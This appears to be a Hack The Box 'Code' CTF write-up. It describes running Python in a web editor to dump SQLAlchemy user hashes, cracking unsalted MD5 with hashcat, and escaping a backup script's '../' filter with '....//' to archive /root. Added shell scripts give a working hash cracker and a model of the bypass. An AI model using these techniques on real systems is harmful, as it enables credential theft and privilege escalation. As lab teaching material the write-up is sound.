HTB-Code Writeup

Shreyas D R

Enumeration:

Interestingly, the web app turns out to be a Python code editor that executes whatever you type:

print(locals()) gave me the following output:

print(globals()) revealed a lot of details too, but nothing interesting except a few functions.

I switched to Burp and looked at the run_code request, where I noticed SQLAlchemy in use (ha ha, some juicy stuff).

After reading through some SQLAlchemy documentation, I ran the following query through the editor:

users = User.query.all()
for user in users:
    print(user.username)
    print(user.password)

This gave me:

759b74ce43947f5f4c91aeddc3e5bad3
martin:3de6f30c4a09c27fc71932bfc68474be

Reversing these (unsalted) MD5 hashes, we get:

There was nothing useful for the development user! 😠 After spending a day on it, I decided to move on to martin.

I used hashcat, but it took forever.

I finally ran it with rockyou.txt (my computer died plenty of times before the hash cracked) and got the password: nafeelswordsmaster.
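The hashes pulled from the users table are unsalted MD5, so cracking them is a pure dictionary lookup: hash each candidate word and compare. The following is an added example of that attack in POSIX sh, written for this writeup rather than taken from the post or the box; it uses md5sum instead of hashcat so it can be run on the tiny constructed wordlist embedded below (the words and the martin line are made up for the demo, and it would be far too slow for rockyou.txt itself). The hashcat invocation it stands in for is given in the header comment.

```shell
#!/bin/sh
# Added example, not code from the original post or the box.
# A minimal offline dictionary attack against unsalted MD5 hashes, the same
# work hashcat does with:
#     hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
# (-m 0 = raw MD5, -a 0 = straight wordlist attack).

# Hex MD5 of a string. printf '%s' so no trailing newline is hashed,
# otherwise md5_hex "password" would not match the stored hash.
md5_hex() {
    printf '%s' "$1" | md5sum | cut -d' ' -f1
}

# Accept both line shapes seen in the dump: "hash" and "user:hash".
hash_part() {
    printf '%s\n' "$1" | awk -F: '{ print $NF }'
}

# crack_md5 <hash-or-user:hash> <wordlist-file>
# Prints the matching word and returns 0, or returns 1 if nothing matches.
crack_md5() {
    target=$(hash_part "$1" | tr 'A-F' 'a-f')
    # "|| [ -n "$word" ]" still tries a last line that lacks a newline.
    while IFS= read -r word || [ -n "$word" ]; do
        if [ "$(md5_hex "$word")" = "$target" ]; then
            printf '%s\n' "$word"
            return 0
        fi
    done < "$2"
    return 1
}

# Demo on a constructed three-word wordlist (not rockyou.txt).
main() {
    wl=$(mktemp)
    printf '%s\n' letmein password123 nafeelswordsmaster > "$wl"
    # One "user:hash" line and one bare hash, hashed here for the demo.
    for line in "martin:$(md5_hex nafeelswordsmaster)" "$(md5_hex wrongword)"; do
        if pw=$(crack_md5 "$line" "$wl"); then
            printf '%s -> %s\n' "$line" "$pw"
        else
            printf '%s -> not in wordlist\n' "$line"
        fi
    done
    rm -f "$wl"
}
main
```

The only thing that makes this feasible is the missing salt: the stored value is exactly md5(password), so one hash per candidate word covers every user at once, which is why an unsalted MD5 column falls to rockyou.txt in minutes on a GPU.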

Now SSH in as martin and we get a nice shell.

Looking around for something interesting, I came across a directory named /backups and an unusual script, /usr/bin/backy.sh.

Reading through backy.sh:

martin@code:~$ cat /usr/bin/backy.sh
#!/bin/bash

if [[ $# -ne 1 ]]; then
    /usr/bin/echo "Usage: $0 <task.json>"
    exit 1
fi

json_file="$1"

if [[ ! -f "$json_file" ]]; then
    /usr/bin/echo "Error: File '$json_file' not found."
    exit 1
fi

allowed_paths=("/var/" "/home/")

updated_json=$(/usr/bin/jq '.directories_to_archive |= map(gsub("\\.\\./"; ""))' "$json_file")

/usr/bin/echo "$updated_json" > "$json_file"

directories_to_archive=$(/usr/bin/echo "$updated_json" | /usr/bin/jq -r '.directories_to_archive[]')

is_allowed_path() {
    local path="$1"
    for allowed_path in "${allowed_paths[@]}"; do
        if [[ "$path" == $allowed_path* ]]; then
            return 0
        fi
    done
    return 1
}

for dir in $directories_to_archive; do
    if ! is_allowed_path "$dir"; then
        /usr/bin/echo "Error: $dir is not allowed. Only directories under /var/ and /home/ are allowed."
        exit 1
    fi
done

/usr/bin/backy "$json_file"

So the script takes a task.json, strips every "../" from the entries in directories_to_archive, writes the result back over the file, rejects any entry that does not start with /var/ or /home/, and then hands the file to /usr/bin/backy. I realised I needed to find a .json file.

In /backups there was a task.json with the following contents:

I ran backy.sh on task.json and found the following:

It produced a .bz2 archive. I extracted it and found the deployment code for the website. Nothing here was interesting, since we were well past that stage, but I searched around anyway.

Now I knew I had to somehow modify this file to get it to archive what I wanted. (This was the hardest part of the box; I generated so many versions and had to take a break and start again after a day.)

Modify task.json's "directories_to_archive" field from /../app-production to /../app. This creates an archive that you can extract with tar -xf. (This took a while to figure out.)

Extracting the .bz2 file creates a home directory tree in which you can find the user flag.

To get root I had to modify task.json plenty of times. I noticed that the script removed "../" from directories_to_archive, and it took me a while to figure out that I needed to modify the exclude field too. Even after that, it took a while to get right.
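The reason a plain "../" never survives but the filter can still be beaten is visible in the script itself: jq's gsub makes one left-to-right pass deleting each literal "../" and never rescans what it produced, and the allowed-path test is only a prefix check. The block below is an added example, written for this writeup and not taken from the post or from the box's backy.sh, that models those two checks in POSIX sh so the filter can be studied offline without jq: sed's s/\.\.\///g stands in for gsub (both are single, non-recursive passes), and is_allowed_path is copied in behaviour. The sample paths are constructed, and the exclude field the post mentions is not shown on the page and is not modelled here.

```shell
#!/bin/sh
# Added example, not code from the original post or from backy.sh.
# Models the two checks backy.sh applies to "directories_to_archive":
#   1. jq '... gsub("\\.\\./"; "")'  -> one left-to-right pass deleting "../"
#   2. is_allowed_path               -> prefix check against /var/ and /home/

allowed_paths="/var/ /home/"

# Step 1: what gsub leaves behind. sed's s///g is also a single
# non-overlapping pass with no rescan, so it behaves the same way.
strip_dotdot() {
    printf '%s\n' "$1" | sed 's#\.\./##g'
}

# Step 2: the prefix check from backy.sh, reproduced with case patterns.
is_allowed_path() {
    for allowed in $allowed_paths; do
        case "$1" in
            "$allowed"*) return 0 ;;
        esac
    done
    return 1
}

# Run a candidate through both steps and report what backy would receive:
# "ACCEPTED <sanitised path>" or "REJECTED <sanitised path>".
check_path() {
    cleaned=$(strip_dotdot "$1")
    if is_allowed_path "$cleaned"; then
        printf 'ACCEPTED %s\n' "$cleaned"
    else
        printf 'REJECTED %s\n' "$cleaned"
    fi
}

# Constructed inputs: an honest path, a naive traversal (stripped to a
# harmless /home/root), a path outside the prefixes, and "....//", where
# deleting the inner "../" leaves "../" behind and the prefix check is
# satisfied because the string still begins with /home/.
main() {
    check_path "/home/app-production/app"
    check_path "/home/../root"
    check_path "/root"
    check_path "/home/....//root"
}
main
```

The lesson for anyone writing such a filter: a sanitiser that deletes a pattern once is not a sanitiser; either loop until nothing changes or, better, canonicalise the path (realpath) and compare the resolved result against the allow list.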

The task.json that finally produced the root .bz2 file:

Now there is a new .bz2 file with root in its name.

Extracting it gives you a root folder in which root.txt lies:

We pwned it YAYYY!!!!

I actually got the root flag before the user flag; the user flag was harder to get, to be honest. I re-modified task.json and respawned the machine plenty of times to make sure I didn't miss the user flag (and got better screenshots, haha 🥲), and somehow still managed to get root before user.

That said, this was a simple box, yet finding ways around it took quite a while. I rate it 5/10.

Thank you for reading. See you again!
